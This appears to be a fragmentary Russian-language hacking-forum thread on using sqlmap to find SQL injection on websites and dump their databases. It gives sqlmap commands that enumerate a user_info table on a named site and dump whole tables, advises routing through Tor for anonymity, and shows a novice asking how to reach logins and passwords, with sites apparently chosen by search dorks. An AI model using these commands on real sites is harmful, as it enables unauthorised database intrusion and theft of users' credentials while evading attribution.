![]() |
Здравствуйте, небольшой мануал по поиску SQLi в примерах The SQL Injection Knowledge Base
|
Печально когда доходишь до паролей а там AES
|
И oпять вызываем уже знакомую процедуру --columns (колоночки) но уже по таблице "user_".
Код: Код:
sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D gbhackers-T user_info --columns |
https://forum.antichat.xyz/attachmen...8498912726.png
И что дальше делать?как увидеть логин и пароль? Яполный ламер,не судите строго. |
Цитата:
или ещё проще, без названия колонки, вытащит сразу все данные изо всех колонок (применять, если данных мало) sqlmap --random-agent -u http:/site.php?id=1 -D название базы -T название таблицы --dump |
Цитата:
|
Неплохо бы еще добавлять параметры --tor и --check-tor (добавит немножко анонимности в пентест)
|
Можно ли эти знания применять определенно на 1 сайт или только, те которые имеют подобный дорк ?
|
самое главное не сказали, а где скачать этот sqlmap
|
Цитата:
|
| Время: 11:00 |